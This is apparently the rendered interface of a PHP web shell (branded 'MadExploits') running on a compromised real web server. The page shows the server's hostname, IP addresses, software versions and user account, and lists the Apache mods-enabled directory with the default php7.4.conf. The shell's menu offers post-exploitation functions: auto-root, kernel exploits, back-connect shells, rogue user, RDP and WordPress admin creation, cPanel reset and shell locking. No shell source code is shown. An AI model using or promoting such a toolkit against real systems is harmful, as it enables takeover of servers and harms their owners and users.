Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.191.97.62
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
etc /
apache2 /
mods-enabled /
[ HOME SHELL ]
Name
Size
Permission
Action
access_compat.load
100
B
-rw-r--r--
alias.conf
843
B
-rw-r--r--
alias.load
62
B
-rw-r--r--
auth_basic.load
94
B
-rw-r--r--
authn_core.load
72
B
-rw-r--r--
authn_file.load
72
B
-rw-r--r--
authz_core.load
72
B
-rw-r--r--
authz_host.load
94
B
-rw-r--r--
authz_user.load
94
B
-rw-r--r--
autoindex.conf
3.29
KB
-rw-r--r--
autoindex.load
70
B
-rw-r--r--
deflate.conf
395
B
-rw-r--r--
deflate.load
84
B
-rw-r--r--
dir.conf
157
B
-rw-r--r--
dir.load
58
B
-rw-r--r--
env.load
58
B
-rw-r--r--
filter.load
64
B
-rw-r--r--
headers.load
66
B
-rw-r--r--
mime.conf
7.5
KB
-rw-r--r--
mime.load
60
B
-rw-r--r--
mpm_prefork.conf
571
B
-rw-r--r--
mpm_prefork.load
108
B
-rw-r--r--
negotiation.conf
724
B
-rw-r--r--
negotiation.load
74
B
-rw-r--r--
php7.4.conf
855
B
-rw-r--r--
php7.4.load
102
B
-rw-r--r--
proxy.conf
822
B
-rw-r--r--
proxy.load
62
B
-rw-r--r--
proxy_http.load
89
B
-rw-r--r--
proxy_wstunnel.load
97
B
-rw-r--r--
reqtimeout.conf
1.16
KB
-rw-r--r--
reqtimeout.load
72
B
-rw-r--r--
rewrite.load
66
B
-rw-r--r--
setenvif.conf
1.34
KB
-rw-r--r--
setenvif.load
68
B
-rw-r--r--
socache_shmcb.load
78
B
-rw-r--r--
ssl.conf
3.04
KB
-rw-r--r--
ssl.load
97
B
-rw-r--r--
status.conf
749
B
-rw-r--r--
status.load
64
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : php7.4.conf
<FilesMatch ".+\.ph(ar|p|tml)$"> SetHandler application/x-httpd-php </FilesMatch> <FilesMatch ".+\.phps$"> SetHandler application/x-httpd-php-source # Deny access to raw php sources by default # To re-enable it's recommended to enable access to the files # only in specific virtual host or directory Require all denied </FilesMatch> # Deny access to files without filename (e.g. '.php') <FilesMatch "^\.ph(ar|p|ps|tml)$"> Require all denied </FilesMatch> # Running PHP scripts in user directories is disabled by default # # To re-enable PHP in user directories comment the following lines # (from <IfModule ...> to </IfModule>.) Do NOT set it to On as it # prevents .htaccess files from disabling it. <IfModule mod_userdir.c> <Directory /home/*/public_html> php_admin_flag engine Off </Directory> </IfModule>
Close